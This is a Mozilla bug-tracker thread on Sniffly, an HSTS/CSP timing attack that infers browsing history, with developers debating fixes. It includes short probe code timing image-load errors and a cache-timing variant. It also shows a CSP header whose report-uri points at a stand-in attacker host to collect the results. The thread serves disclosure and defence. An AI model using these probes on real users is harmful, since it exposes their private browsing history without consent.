Bug 1218778 (Open) - Opened 9 years ago, Updated 1 year ago

Sniffly: a timing attack on HSTS to steal user's history

Categories

(Core :: Security, defect)

People

(Reporter: ehsan.akhgari, Unassigned)

References

(Blocks 1 open bug)

Details

The trick this uses is to restrict image loads to http: through CSP, then load an http image and time how long it takes for the onerror event to fire.  If the time is below a threshold, it concludes that the redirect didn't happen over the network, so it must have come from HSTS, which indicates that the site has been visited.
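
Roughly, the probe looks something like the sketch below (a minimal illustration, not the actual Sniffly code; the host name, probe path, and threshold are placeholders):

    // Assumes the page is served with a CSP of "img-src http:", so an
    // internal HSTS upgrade to https:// violates the policy and fires
    // onerror with almost no delay.
    function probe(host: string, thresholdMs = 10): Promise<boolean> {
      return new Promise<boolean>((resolve) => {
        const img = new Image();
        const start = performance.now();
        // HSTS entry present: the http:// URL is rewritten to https://
        // before touching the network, the CSP blocks it, and onerror is
        // fast.  No entry: the redirect happens over the wire first, so
        // onerror is slow.
        img.onerror = () => resolve(performance.now() - start < thresholdMs);
        img.onload = () => resolve(false); // nothing blocked; inconclusive
        img.src = "http://" + host + "/favicon.ico?" + Math.random();
      });
    }

    // Usage: probe("example.com").then(visited => console.log(visited));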

In my testing, the demo is not super reliable, but it gave me correct results some of the time in non-e10s.  The results are much worse in e10s, presumably because of the way Necko works.

Should we do something about this, by making HSTS redirects take longer?
Flags: needinfo?(rlb)
Code for the proof of concept is here: https://github.com/diracdeltas/sniffly

Demonstration available here: http://zyan.scripts.mit.edu/sniffly/
Summary: sniffly: a timing attack on HSTS to steal user's history → Sniffly: a timing attack on HSTS to steal user's history
Moving to (non-crypto) Security, since it lies more in HSTS/CSP than it does in the networking code (which is working fine). If that's wrong, feel free to move it elsewhere.
Component: Networking: HTTP → Security
OS: Unspecified → All
Hardware: Unspecified → All
The HSTS redirect happens inside Necko...
(In reply to Ehsan Akhgari (don't ask for review please) from comment #0)
> Should we do something about this, by making HSTS redirects take longer?

Please also see:
https://bugzilla.mozilla.org/show_bug.cgi?id=1218524#c2
Some relevant Tor Browser tickets: https://trac.torproject.org/projects/tor/ticket/17423, https://trac.torproject.org/projects/tor/ticket/6458

I think the latter approach (double-keying HSTS by first- and third-party origins; rough sketch below) is worth considering for Firefox. It reduces HSTS's effectiveness but would prevent future HSTS supercookies like this.

-Yan
Blocks: 1218524
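To make the double-keying idea above concrete, here is a rough conceptual sketch (hypothetical names; this is not Necko's nsISiteSecurityService API):

    // HSTS entries are stored under (first-party origin, host) rather than
    // host alone, so state learned while example.org was the top-level page
    // is invisible to a probe running under attacker.example.
    class DoubleKeyedHSTS {
      private entries = new Map<string, number>(); // key -> expiry (ms since epoch)

      private key(firstParty: string, host: string): string {
        return firstParty + "|" + host;
      }

      noteHeader(firstParty: string, host: string, maxAgeSeconds: number): void {
        this.entries.set(this.key(firstParty, host), Date.now() + maxAgeSeconds * 1000);
      }

      shouldUpgrade(firstParty: string, host: string): boolean {
        const expiry = this.entries.get(this.key(firstParty, host));
        return expiry !== undefined && expiry > Date.now();
      }
    }

The trade-off mentioned above is visible here: a subresource host is only upgraded under first parties where its header has already been seen.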
To put this in context, let's note that this is no worse than existing attacks that exploit cache timing.  Those are going to be present regardless of HSTS/CSP.

Yan, your suggestion makes me really uneasy.  I would really prefer if we could avoid reducing the scope of HSTS.  In addition to reducing the utility of HSTS, making that change would arguably violate the semantics of HSTS.

I think my preferred solution would be to simply remove "img-src http:" from the CSP spec, or at least explicitly allow HTTPS redirects.  After all, loading the image over non-secure HTTP means that you'll accept whatever the network gives you anyway, so there's no harm in accepting a redirect.  And it addresses this problem because you would never hit the error callback.
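
For reference, the policy that makes the fast-error probe possible is just the following (illustrative header); under the change suggested above, an upgrade of such an image load to https: (via HSTS or a 30x redirect) would be allowed rather than treated as a violation:

    Content-Security-Policy: img-src http: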
Flags: needinfo?(rlb)
It's worth noting that fixing this by removing "img-src http:" from CSP won't fix this other HSTS sniffing attack that does the same thing as Sniffly but slower: https://code.google.com/p/chromium/issues/detail?id=436451. I checked and it seems to still work in Firefox.
> Should we do something about this, by making HSTS redirects take longer?
There is still the "report-uri" field, which provides a slower but more reliable way to detect the same thing.
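
A sketch of that variant, assuming an attacker-controlled collection endpoint (hypothetical URL): with the policy below, an HSTS upgrade of the http: image load to https: is blocked as a violation, and the violation report, which carries the blocked URI, tells the attacker's server which probes were upgraded, no timing required.

    Content-Security-Policy: img-src http:; report-uri https://attacker.example/collect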
This approach is easily duplicated without HSTS by timing the load of image logos, favicon.ico files, etc., rather than the HSTS error response.

>> It's worth noting that fixing this by removing "img-src http:" from CSP won't fix this other HSTS sniffing attack that does the same thing as Sniffly but slower: https://code.google.com/p/chromium/issues/detail?id=436451. I checked and it seems to still work in Firefox.

And that Chrome bug is marked WontFix.
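
For comparison, a minimal sketch of that non-HSTS cache-timing variant described above (threshold and URL are placeholders; real attacks calibrate per resource):

    // Time a well-known third-party resource (logo, favicon.ico, a common
    // JS library).  A very fast onload suggests it was served from the HTTP
    // cache, i.e. the user has been there before.  Works without HSTS or CSP.
    function cachedProbe(url: string, thresholdMs = 15): Promise<boolean> {
      return new Promise<boolean>((resolve) => {
        const img = new Image();
        const start = performance.now();
        img.onload = () => resolve(performance.now() - start < thresholdMs);
        img.onerror = () => resolve(false);
        img.src = url; // no cache-buster: hitting the cache is the point
      });
    }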
Why not kill timing attacks on third-party domains by allowing accurate timing only for resources from allowed origins?
Quoting myself from bug 1225066:
> You mustn't be able to measure the time it takes to load cross-domain resources. Even if we block the timing APIs in the callback, a page could build its own timestamper. So I suggest artificially increasing the JS-observable load time to a normally distributed random value with mean = (average ping + size / average network speed), averaged over all Firefox users so the value is the same for everybody, and standard deviation = size / (3 × network speed). Why not just use the same fixed delay for everybody? Because that would let the attacker reliably detect the case where the file takes longer than the average time to load.
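
A sketch of the jitter being proposed (the mean and spread formulas come from the comment above; the population-average constants are placeholders):

    // Report a load to script only after a normally distributed synthetic
    // time based on resource size and population-wide averages, so the
    // JS-observable timing follows the same distribution for every user.
    const AVG_RTT_MS = 50;          // placeholder population average
    const AVG_BYTES_PER_MS = 500;   // placeholder, roughly 4 Mbit/s

    function syntheticLoadTimeMs(sizeBytes: number): number {
      const mean = AVG_RTT_MS + sizeBytes / AVG_BYTES_PER_MS;
      const stdDev = sizeBytes / (3 * AVG_BYTES_PER_MS);
      // Box-Muller transform for a standard normal sample.
      const u = Math.random() || Number.MIN_VALUE;
      const v = Math.random();
      const z = Math.sqrt(-2 * Math.log(u)) * Math.cos(2 * Math.PI * v);
      return Math.max(0, mean + stdDev * z);
    }

    // The JS-visible load event would then fire no earlier than
    // max(actualLoadTime, syntheticLoadTimeMs(sizeBytes)).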
Is this really new? See https://tools.ietf.org/html/rfc6797#section-14.9 and https://lists.w3.org/Archives/Public/public-webappsec/2014Sep/thread.html#msg108, and I believe there are several other potential attacks on the HSTS cache. When I last asked about this, the goal was just to get as many sites on the HSTS preload list as possible until, at some point, we could invert the whole thing and have a list of sites that do not work over HTTPS yet.
> I suggest artificially increasing the JS-observable load time to a normally distributed random value

By simulating a delay to make cached assets appear to load at the same speed as assets loaded over the wire, you're effectively eliminating the client-side benefit of caching (i.e. performance).

> Why not kill timing attacks on third-party domains by allowing accurate timing only for resources from allowed origins?

You'd have to kill all active timers in JavaScript on any asset load to accomplish this. The time measurement is not part of the request itself, but part of a script that watches activity.
> By simulating a delay to make cached assets appear to load at the same speed as assets loaded over the wire, you're effectively eliminating the client-side benefit of caching (i.e. performance).
No, they are loaded and displayed as fast as possible if they are in the displayed part of the page, but JS-observable changes like events or DOM mutations should only happen after the delay. Also note that this behavior is proposed only for disallowed third-party origins. RIAs usually request resources controlled by the same owner, which means the delay won't affect them; even if it did, it could be eliminated by setting the correct permissions.

> You'd have to kill all active timers in JavaScript on any asset load to accomplish this. The time measurement is not part of the request itself, but part of a script that watches activity.

I'm proposing a solution meant to kill all timing attacks on fingerprinting origins, which shouldn't break most RIAs. I think eliminating this attack is worth some short-term problems for a minority of RIAs.
*if they are in the displayable part of the DOM
> You'd have to kill all active timers in JavaScript on any asset load to accomplish this.
No, all you need to do is have two different DOM views (one for rendering, one for JS) and delay all the events for restricted objects. I mean, make the JS-observable DOM look like the resource really took that long to load, and delay all the events.
*all the events related to the restricted object.
> Also note that this behavior is proposed only for disallowed third-party origins.

I was referring to the equivalent non-HSTS vector, but perhaps that should be discussed elsewhere.  The assets being tested are generally going to be unrestricted by origin, e.g. img and script loads.

And the concern isn't related solely to cross-origin requests; it's about user privacy. Privacy could still be compromised by scripts on the same origin, e.g. to determine whether a user who cleared cookies has ever visited before.

Also, deferring all JS events could have a major impact on load and startup animations.
> The assets being tested are generally going to be unrestricted by origin, e.g. img and script loads.
Loads are not restricted; getting accurate timing through JS should be restricted. For example, say we have a cross-domain img. If it loads faster than the computed time, the browser should show it immediately, but JS (for example the getBoundingClientRect API) should behave as if it hasn't loaded yet, until that time has passed.

> Privacy could still be compromised by scripts on the same origin, e.g. to determine whether a user who cleared cookies has ever visited before.

As far as I know, Mozilla hasn't merged the Tor Project patches to prevent canvas fingerprinting. And the problem here is not only fingerprinting, but disclosure of information the site shouldn't be able to get.
Severity: normal → S3